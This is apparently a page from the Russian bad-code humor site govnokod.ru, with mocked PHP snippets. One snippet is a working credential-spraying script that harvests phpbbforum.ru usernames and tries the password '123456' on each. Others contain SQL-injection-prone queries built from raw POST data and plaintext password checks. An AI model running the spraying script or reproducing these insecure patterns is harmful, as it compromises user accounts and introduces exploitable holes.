- 1
exit; ?>
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+144
exit; ?>
Самая последняя строчка в скрипте.
+150
<?session_start();
require_once "../Source/connect.php";
require_once "../Models/Comment(class).php"?>
<link rel="stylesheet" href="../Source/style.css" type="text/css" />
<a href="../Forms/Register_form.php">Регистрация</a> <br/><br/>
<form name="login" action="../Controller/Controller.php" method="post">
<input name="login" type="text" value=""> Логин <br/>
<input name="password" type="password" value=""> Пароль <br/>
Введите данные:<br/><br/>
<input name="do" type="submit" value="Войти">
<?session_destroy();?>
</form>
<?
$comment = new Comm();
$comment->Menu();
$comment->Coments();
?>
Хочется назвать сие творение: "Очень быстрая сессия".
Это весь код главной страницы простенького сайта-блога. Автор даже не подозревает о существовании тегов <html>, <head> и <body>. Вначале можно было подумать, что он засунул их в один из подключаемых файлов, а нет. Просто не нужны они ему и все.
+166
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" type="text/css" href="table style.css"/>
<?
@session_start();
if(!isset($_SESSION['login']))
{ echo '<div id="sulochki" style="top:80px; position:absolute; left: 678px;"><a href="avtorizaciya.php">Вход</a></div>'; }
if(isset($_SESSION['login']))
{ echo '<div style="top:85px; position:absolute; left: 678px;">
<form action="obrabotka avtorizaciy.php" method="post">
<input type="submit" name="logout" style="color:#F93; font-size:18px" value=" Выход "/> </form> </div>'; }
if(isset($_SESSION['login'])) {
$str=strtoupper($_SESSION['niks']);
echo'<div style="position:absolute;left:650; top:25; color:#FFF; font-size:21px; z-index:1">Здравствуйте '.$str.'</div>';}
?>
Содержание файла с емким названием "vhod_vuchod.php"
+160
$ix=$_POST['danue'];
if(isset($_POST['danue'])){
$reyd="INSERT INTO `NOVOSTI` (`CONNTEKT`) VALUES ('{$ix}')";
$rido=mysql_query($reyd) or die ("no dannuch");
header ('location: index.php');}
+159
define(hostname, 'http://phpbbforum.ru');
$file = './txt/users_phpbb.txt';
function get_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return $users[1];
}
function get_num_users($data)
{
preg_match_all('!">(.*?)</a></b>!', $data, $users);
return count($users[1]);
}
function get_num_pages($data)
{
preg_match('!">(\d{1,8})</a><form action!', $data, $num_pages);
return $num_pages[1];
}
function curl_header($url)
{
$ch = curl_init ($url);
curl_setopt($ch, CURLOPT_USERAGENT, useragent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function brut($url)
{
$data = curl_header($url);
$count = substr_count($data, 'Cookie');
if($count == 2)
return false;
else
return true;
}
function get_pages($num)
{
global $users_per_page;
for($i = 0; $i<$num; $i++)
$data .= req(hostname . '/memberlist.php?mode=posts&order=DESC&start=' . $users_per_page * $i);
return $data;
}
if(!file_exists($file))
{
$data = req(hostname.'/memberlist.php');
$users_per_page = get_num_users($data);
$num_pages = get_num_pages($data);
$pages = get_pages($num_pages);
$users = get_users($pages);
$fp = fopen($file, 'w');
$users = implode("\n", $users);
fputs($fp, $users);
fclose($fp);
}
$users = file_get_contents($file);
$users = explode("\n", $users);
$count = count($users);
$pass = '123456';
for($i = 0; $i<$count; $i++)
{
if( brut(hostname.'/login.php?username='.urlencode($users[$i])."&password=$pass") )
$good[] = $users[$i];
}
$fp = fopen("./txt/$pass.txt", 'a+');
fputs($fp, implode("\n", $good));
fclose($fp);
print_r($good);
+172
<?php
$strings = array();
$strings[] = "10_strings_0";
$strings[] = "10_strings_1x";
$strings[] = "10_strings_2";
$strings[] = "10_strings_3";
$strings[] = "10_strings_4x";
$strings[] = "10_strings_5x";
$strings[] = "10_strings_6";
$strings[] = "10_strings_7x";
$strings[] = "10_strings_8";
$strings[] = "10_strings_9";
// СПИСОК СТРОК ИЗ 100 СТРОК В КОТОРЫХ БУДЕТ ОСУЩЕСТВЛЯТЬСЯ ПОИСК СТРОК ИЗ СПИСКА $strings
for ($counter=0; $counter<100; $counter++)
{
$check_strings[] = "10_strings_".$counter;
}
// Временная папка - папка со скриптом
// создание vbs файлов
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++)
{
$file = fopen($strings[$strings_c].'.vbs', 'w');
fwrite($file, 'Set Program = Wscript.CreateObject("Wscript.Shell")'.PHP_EOL.'Program.Run("'.$strings[$strings_c].'.bat'.'")'.PHP_EOL.'Wscript.Quit');
fclose($file);
}
// создание bat файлов
$interpreter_root = 'C:\xampp\php\php.exe'; // путь к PHP интерпретатору
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++)
{
$file = fopen($strings[$strings_c].'.bat', 'w');
fwrite($file, $interpreter_root.' '.$strings[$strings_c].'.php');
fclose($file);
}
// создание php файлов
for ($strings_c=0; $strings_c<sizeof($strings); $strings_c++) {
$code = '<?php
$string = \''.$strings[$strings_c].'\'; // строка для проверки, в каждом экземпляре своя
for ($counter=0; $counter<100; $counter++)
{
$check_strings[] = "10_strings_".$counter;
}
shuffle($check_strings);
$ok = false;
for ($check_strings_c=0; $check_strings_c<sizeof($check_strings); $check_strings_c++)
{
if ($string == $check_strings[$check_strings_c])
{
$ok = true;
break;
}
}
if ($ok == true)
{
$file = fopen("'.$strings[$strings_c].'_ok.txt", "w");
fclose($file);
}
?>';
$file = fopen($strings[$strings_c].'.php', 'w');
fwrite($file, $code);
многопоточность на PHP
+151
function pro($input) {
$input=str_replace("\0", '_', $input);
$input=trim($input);
$input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\\'=>'\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~'));
return $input;
}
function depro($input) {
$input=strtr($input,array('!'=>'!','"'=>'"','$'=>'$','%'=>'%',"'"=>"'",'('=>'(',')'=>')','*'=>'*','+'=>'+',','=>',','-'=>'-','.'=>'.','/'=>'/',':'=>':','<'=>'<','='=>'=','>'=>'>','?'=>'?','@'=>'@','['=>'[','\'=>'\\',']'=>']','^'=>'^','_'=>'_','`'=>'`','{'=>'{','|'=>'|','}'=>'}','~'=>'~'));
return $input;
}
во всяком случае аффтар считает что это действительно защита не в рот ибацца, anti sql inj.. это вам не это.
+160
if( isset( $_POST['username'] ) && $_POST['username'] != '' ) {
$username = $_POST['username'];
$password = $_POST['password'];
$rs = mysql_query( "select * from admin" );
$row = mysql_fetch_array( $rs ) ;
//echo "$username == $row[username] && $password == $row[password]";
if( $username == $row['username'] && $password == $row['password'])
{
session_register( 'ADMIN_NAME' );
$_SESSION['ADMIN_NAME'] = $row['name'];
header( "Location: home.php" );
exit;
} else
$err = "Your Username and Password is invalid";
}
Это же просто песня! К слову: сайт был написан румынскими кодерами чуть больше года назад.
+162
if ($is_home) {
echo '<script>
function chkcbfrm() {
var el = $(\'#inppleasecallback\')[0];
if ((el.value == \'\') || (el.value == el.defaultValue)) {
alert(\'Введите номер телефона...\');
return false;
} else
return true;
}
</script>';
echo '<form method="post" id="frmcallback" onsubmit="return chkcbfrm();">';
echo '<p>Введите пожалуйста телефон в формате +7-3812-XXXXXX</p>';
echo '<input type="text" class="textboxcontact" style="width: 220px" id="inppleasecallback" name="please_callback" value="Введите номер телефона" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;" />';
echo '<a href="#" class="butmore" onclick="if (chkcbfrm()) $(\'#frmcallback\').submit(); return false;">Перезвоните</a>';
echo '<form>';
} else {
$ЕБАНУТЫЙ_ТЕКСТ = 'Введите пожалуйста телефон в формате +7-3812-XXXXXX (код страны - код города - номер), название организации, ФИО контактного лица и предмет интереса (XXX, XXX, металлопрокат, XXXXXX, крановое хозяйство)';
echo '<form method="post" id="frmcallback" onsubmit="if ($(\'#inppleasecallback\')[0].value == $(\'#inppleasecallback\')[0].defaultValue) { alert(\'Введите номер телефона...\'); return false; }">';
echo '<textarea class="textareacontact" style="width: 220px; height: 150px;" id="inppleasecallback" name="please_callback" onfocus="if(this.value==this.defaultValue) this.value=\'\';" onblur="if(this.value==\'\') this.value = this.defaultValue;">'.$ЕБАНУТЫЙ_ТЕКСТ.'</textarea>';
echo '<input class="submitcontact" type="submit" value="Перезвоните" />';
echo '<form>';
}
по просьбе заказчика текст менялся 2-3 раза на дню, за что и получил такое название
+158
<table border="1" class="new" bgcolor ="#F5F5F5">
<tr>
<td><b>День</b></td>
<td><b>До обеда</b></td>
<td><b>После обеда</b></td>
<?php
while ($row = mysql_fetch_assoc($query)){
$date = $row['date'];
$Id_date = convert($date);
$date = substr ($date,8);
//Проверка на повторность дня (один день-два события!)
if ($count == $date){
$time = $row['time'];
if ($time == 'До обеда'){
echo '<td>';
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
//"Совещание" красным
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
}
elseif ($time == 'После обеда'){
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
echo "</tr>";
}
}
// Блок для выполнения при отрицательной проверки на повторность дня
else {
$res1 = rus_days($Id_date);
echo "<tr>";
echo "<td>$date $res1</td>";
$time = $row['time'];
if ($time == 'До обеда'){
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
}
elseif ($time == 'После обеда'){
echo "<td>";
$judge = $row['judge'];
$query1 = mysql_query ("SELECT `desc` FROM `judge` WHERE `id` = $judge",$db);
$row1 = mysql_fetch_assoc ($query1);
$judge1 = $row1['desc'];
if ($judge1 == 'Совещание'){
echo "<td class='new_color'>$judge1</td>";
}
else{
echo "<td>$judge1</td>";}
echo "</td>";
echo "</tr>";
}
Формирование таблицы. Данные тянутся из БД.